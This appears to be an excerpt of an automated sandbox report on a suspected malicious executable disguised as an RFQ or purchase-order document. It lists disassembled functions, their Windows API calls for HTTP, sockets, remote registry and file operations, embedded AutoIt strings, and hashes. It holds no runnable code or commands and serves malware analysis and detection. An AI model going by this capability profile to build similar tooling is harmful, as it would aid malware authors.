Opcode ID: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
Instruction ID: b085f3065cf9cd100f04f322da00d4b037e108fc79bf5967fdabce1cd6d2e74b
Opcode Fuzzy Hash: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
Instruction Fuzzy Hash: 7B116971790704B7F620AB958C8AF5A7399EF88B11F20080DF790AB1C1C9F5E4418B7C

Function 0045427D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 259libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00000000), ref: 0045435B
GetProcAddress.KERNEL32(?,AU3_FreeVar), ref: 00454371
_malloc.LIBCMT ref: 004543B1
_strlen.LIBCMT ref: 00454409
_malloc.LIBCMT ref: 00454413
_strcat.LIBCMT ref: 00454420

Strings

AU3_FreeVar, xrefs: 0045436B

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: AddressProc_malloc$_strcat_strlen
String ID: AU3_FreeVar
API String ID: 2184576858-771828931
Opcode ID: 10d9e78008ba5b5703de8dc23ed72c3cd296113dc033390a1be7ca980e1f1503
Instruction ID: c940ad03d776ce5ee908f8b881b33357b51647545ffc53e819ca791e1fdac2da
Opcode Fuzzy Hash: 10d9e78008ba5b5703de8dc23ed72c3cd296113dc033390a1be7ca980e1f1503
Instruction Fuzzy Hash: EDA18DB5604205DFC300DF59C480A2AB7E5FFC8319F1489AEE9554B362D739ED89CB8A

Function 00401D10 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 235COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D5A
DestroyWindow.USER32(?), ref: 0042A751
UnregisterHotKey.USER32(?), ref: 0042A778
FreeLibrary.KERNEL32(?), ref: 0042A822
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0042A854

Strings

close all, xrefs: 00401D55

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
String ID: close all
API String ID: 4174999648-3243417748
Opcode ID: 9f9deb73285226e6ba240568d142da5fec9cf520cd27fc9a3a2cacaca98377aa
Instruction ID: e23b5dd52123a376b0379481fe8be5d2f02d07e70979f80a1c72d587d5a24a2c
Opcode Fuzzy Hash: 9f9deb73285226e6ba240568d142da5fec9cf520cd27fc9a3a2cacaca98377aa
Instruction Fuzzy Hash: FFA17075A102248FCB20EF55CC85B9AB3B8BF44304F5044EEE90967291D779AE85CF9D

Function 0044AA1F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 171networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AA5A
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AA8D
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0044AAF9
InternetSetOptionW.WININET(00000000,0000001F,?,00000004), ref: 0044AB11
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB20
HttpQueryInfoW.WININET(00000000,00000005,?,00000000,00000000), ref: 0044AB61

Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880

Strings

, xrefs: 0044AB59

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
String ID:
API String ID: 1291720006-3916222277
Opcode ID: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
Instruction ID: 782b6278bf246bef60821ca34847c3ce69a0d92f774604c9678bedd135ce19ea
Opcode Fuzzy Hash: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
Instruction Fuzzy Hash: 9C51E6B12803016BF320EB65CD85FBBB7A8FB89704F00091EF74196181D7B9A548C76A

Function 0046BB59 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 168networkCOMMON

Download Yara Rule

APIs

select.WSOCK32 ref: 0046BD1C
WSAGetLastError.WSOCK32(00000000), ref: 0046BD2C

Strings

HH, xrefs: 0046BB8A

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: ErrorLastselect
String ID: HH
API String ID: 215497628-2761332787
Opcode ID: d4dee826ad07c8790196afe3a66b02134916bcd065c8c5f95b8a7bfd3fd6b23c
Instruction ID: a252b81ccbce03d1e7b1b0efababa2c0a0929072778302a7b1202b90a7697d70
Opcode Fuzzy Hash: d4dee826ad07c8790196afe3a66b02134916bcd065c8c5f95b8a7bfd3fd6b23c
Instruction Fuzzy Hash: BF51E4726043005BD320EB65DC42F9BB399EB94324F044A2EF558E7281EB79E944C7AA

Function 0047D2F8 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 162COMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 0047D39F
__snwprintf.LIBCMT ref: 0047D43B
_wcscpy.LIBCMT ref: 0047D4D0

Strings

0vH, xrefs: 0047D4F9
, $, xrefs: 0047D47B
AUTOITCALLVARIABLE%d, xrefs: 0047D42F
CALLARGARRAY, xrefs: 0047D393

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: __snwprintf__wcsicoll_wcscpy
String ID: , $$0vH$AUTOITCALLVARIABLE%d$CALLARGARRAY
API String ID: 1729044348-3708979750
Opcode ID: 19d8c814bf70bb05cadf871115a188aa6336bc7b5c41e4e48777219efcb9f973
Instruction ID: 823d0c4529048d9f890bbf28e75db1a658c609af9319d28fcdda535ef0d13f31
Opcode Fuzzy Hash: 19d8c814bf70bb05cadf871115a188aa6336bc7b5c41e4e48777219efcb9f973
Instruction Fuzzy Hash: E651A571514300ABD610EF65C882ADFB3A4EFC4348F048D2FF54967291D779E949CBAA

Function 0044BBC9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 100filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe,?,C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe,004A8E80,C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe,0040F3D2), ref: 0040FFCA

lstrcmpiW.KERNEL32(?,?), ref: 0044BC04
MoveFileW.KERNEL32(?,?), ref: 0044BC38
_wcscat.LIBCMT ref: 0044BCAA
_wcslen.LIBCMT ref: 0044BCB7
_wcslen.LIBCMT ref: 0044BCCB
SHFileOperationW.SHELL32 ref: 0044BD16

Strings

\*.*, xrefs: 0044BCA4

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
String ID: \*.*
API String ID: 2326526234-1173974218
Opcode ID: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
Instruction ID: 9e4979448571685848097db6772507fbfe8bfb8d1337cd0032b1ea927bdad9db
Opcode Fuzzy Hash: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
Instruction Fuzzy Hash: 4B3183B14083019AD724EF21C5D5ADFB3E4EFC8304F444D6EB98993251EB39E608D7AA

Function 004366BE Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON

Download Yara Rule

APIs

Part of subcall function 00436328: _wcsncpy.LIBCMT ref: 0043633C

_wcslen.LIBCMT ref: 004366DD
GetFileAttributesW.KERNEL32(?), ref: 00436700
GetLastError.KERNEL32 ref: 0043670F
CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00436727
_wcsrchr.LIBCMT ref: 0043674C

Part of subcall function 004366BE: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00000000), ref: 0043678F

Strings

\, xrefs: 004366E9

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
String ID: \
API String ID: 321622961-2967466578
Opcode ID: 1eb455b432650c328f353f4bd1bc621d200bc06401c5471b489e88a9126e4646
Instruction ID: 68cadaa88695c7c006562ade17844284f7fc34f8e7e15af3b97584e331f528d6
Opcode Fuzzy Hash: 1eb455b432650c328f353f4bd1bc621d200bc06401c5471b489e88a9126e4646
Instruction Fuzzy Hash: 3C2148765003017ADB20A724EC47AFF33989F95764F90993EFD14D6281E779950882AE

Function 0044C80C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 83COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0044C81E
__wcsnicmp.LIBCMT ref: 0044C8D8

Strings

#OnAutoItStartRegister, xrefs: 0044C83D
#notrayicon, xrefs: 0044C818
#requireadmin, xrefs: 0044C8D2

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: 8fabdde956d602f6b8b7368bcff20dfc7d0b0c72369e2d81c3549115c9808aba
Instruction ID: f72ce1d64a5a3b865947b719243e4701f1ba8c8209579f194a7ae3ad15c73224
Opcode Fuzzy Hash: 8fabdde956d602f6b8b7368bcff20dfc7d0b0c72369e2d81c3549115c9808aba
Instruction Fuzzy Hash: 1B21F87261161067E730B659DCC2BDB63985F65305F04406BF800AA247D6ADA98A83AA

Function 0047439D Relevance: 12.3, APIs: 8, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61459f4a8200ef3d52de203114b28894f5d4b3bd8466eb3c739413db927d5df4
Instruction ID: 650af14def374fe6fd11052fbef22cb8aa6c894e3601bf285572d08ae3c4fed9
Opcode Fuzzy Hash: 61459f4a8200ef3d52de203114b28894f5d4b3bd8466eb3c739413db927d5df4
Instruction Fuzzy Hash: 439192726043009BD710EF65DC82BABB3E9AFD4714F004D2EF548E7291D779E944875A

Function 00441561 Relevance: 12.1, APIs: 8, Instructions: 101windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(?), ref: 0044157D
GetDC.USER32(00000000), ref: 00441585
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00441590
ReleaseDC.USER32(00000000,00000000), ref: 0044159B
CreateFontW.GDI32(?,00000000,00000000,00000000,?,000000FF,000000FF,000000FF,00000001,00000004,00000000,?,00000000,00000000), ref: 004415E9
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00441601
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00441639
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00441659

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
Instruction ID: 4e191e68d33858d232da06d8f8bca50b2e2c885119a5133d865ec5329e905ca2
Opcode Fuzzy Hash: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
Instruction Fuzzy Hash: 1531C172240344BBE7208B14CD49FAB77EDEB88B15F08450DFB44AA2D1DAB4ED808B64

Function 004140DB Relevance: 12.0, APIs: 8, Instructions: 42threadCOMMON

Download Yara Rule

APIs

___set_flsgetvalue.LIBCMT ref: 004140E1

Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE

___fls_getvalue@4.LIBCMT ref: 004140EC

Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72

___fls_setvalue@8.LIBCMT ref: 004140FF

Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9

GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
ExitThread.KERNEL32 ref: 0041410F
GetCurrentThreadId.KERNEL32 ref: 00414115
__freefls@4.LIBCMT ref: 00414135
__IsNonwritableInCurrentImage.LIBCMT ref: 00414148

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
String ID:
API String ID: 1925773019-0
Opcode ID: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
Instruction ID: d0499dd1a11a7aa3f5f6b81cdb2be0183561266298d4129ec5ef95b8f2f1ff50
Opcode Fuzzy Hash: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
Instruction Fuzzy Hash: 12018430000200ABC704BFB2DD0D9DE7BA9AF95345722886EF90497212DA3CC9C28B5C

Function 004357AD Relevance: 12.0, APIs: 8, Instructions: 36COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(00000038), ref: 004357C3
VariantClear.OLEAUT32(00000058), ref: 004357C9
VariantClear.OLEAUT32(00000068), ref: 004357CF
VariantClear.OLEAUT32(00000078), ref: 004357D5
VariantClear.OLEAUT32(00000088), ref: 004357DE
VariantClear.OLEAUT32(00000048), ref: 004357E4
VariantClear.OLEAUT32(00000098), ref: 004357ED
VariantClear.OLEAUT32(000000A8), ref: 004357F6

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 108e33c2045b04221b4df3f02cd388125a51a7e0134505e60bdc817f2fb2f336
Instruction ID: 4669651a97e20320d925a323ac357da1b1419afffb7c9eb93274aad60c959a81
Opcode Fuzzy Hash: 108e33c2045b04221b4df3f02cd388125a51a7e0134505e60bdc817f2fb2f336
Instruction Fuzzy Hash: BDF03CB6400B446AC235EB79DC40BD7B7E86F89200F018E1DE58783514DA78F588CB64

Function 00464A0E Relevance: 10.8, APIs: 7, Instructions: 281networkmemoryCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?,?), ref: 00464ADE

Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003

inet_addr.WSOCK32(?,00000000,?,?,00000101,?,?), ref: 00464B1F
gethostbyname.WSOCK32(?,?,00000000,?,?,00000101,?,?), ref: 00464B29
_memset.LIBCMT ref: 00464B92
GlobalAlloc.KERNEL32(00000040,00000040), ref: 00464B9E
GlobalFree.KERNEL32(00000000), ref: 00464CDE
WSACleanup.WSOCK32 ref: 00464CE4

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memsetgethostbynameinet_addr
String ID:
API String ID: 3424476444-0
Opcode ID: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
Instruction ID: 8d90feaebe95447676150adcea4a136074f650e12d33839f26a9dde16614cdb7
Opcode Fuzzy Hash: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
Instruction Fuzzy Hash: A3A17EB1504300AFD710EF65C982F9BB7E8AFC8714F54491EF64497381E778E9058B9A

Function 00440B39 Relevance: 10.8, APIs: 7, Instructions: 261COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000000F), ref: 00440B7B

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-0
Opcode ID: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
Instruction ID: 1e23dbab6d9439f1299be2c39bdf7de0481ead398f869a6d5eaf0ea33fa99bdf
Opcode Fuzzy Hash: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
Instruction Fuzzy Hash: 8EA19C70608701DBE314CF68C984B6BBBE1FB88704F14491EFA8593251E778F965CB5A

Function 0046AB70 Relevance: 10.8, APIs: 7, Instructions: 260registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AC62

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: ConnectRegistry_wcslen
String ID:
API String ID: 535477410-0
Opcode ID: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
Instruction ID: 71109d01e6e71572d3d886d5d9f1e4ab699fb1be984f768d753da2f0a00da466
Opcode Fuzzy Hash: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
Instruction Fuzzy Hash: BBA18EB1204300AFC710EF65C885B1BB7E4BF85704F14896EF685AB292D779E905CB9B

Function 0045377F Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012

_memset.LIBCMT ref: 004538C4
GetMenuItemInfoW.USER32(?,?), ref: 004538EF
_wcslen.LIBCMT ref: 00453960
SetMenuItemInfoW.USER32(00000011,?,00000000,?), ref: 004539C4
SetMenuDefaultItem.USER32(?,000000FF,00000000,?,?), ref: 004539E0

Strings

0, xrefs: 004538BC

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default_memset_wcscpy
String ID: 0
API String ID: 3530711334-4108050209
